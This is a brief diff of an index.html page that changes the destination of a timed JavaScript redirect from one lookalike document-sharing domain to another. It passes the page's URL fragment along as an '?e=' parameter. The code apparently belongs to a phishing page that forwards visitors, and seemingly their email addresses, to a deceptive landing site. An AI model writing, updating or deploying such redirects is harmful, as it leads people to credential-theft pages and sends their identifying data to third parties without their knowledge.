--- a/index.html
+++ b/index.html
@@ -94,7 +94,7 @@
         const fragment = getFragment();
         
         setTimeout(() => { 
-            let redirectUrl = `https://fax.documenthoster.com/K46S8/`;
+            let redirectUrl = `https://apprvdshareddocs.filesharing.it.com/pqsFL/`;
             if (fragment) {
                 redirectUrl += `?e=${fragment}`;
             }
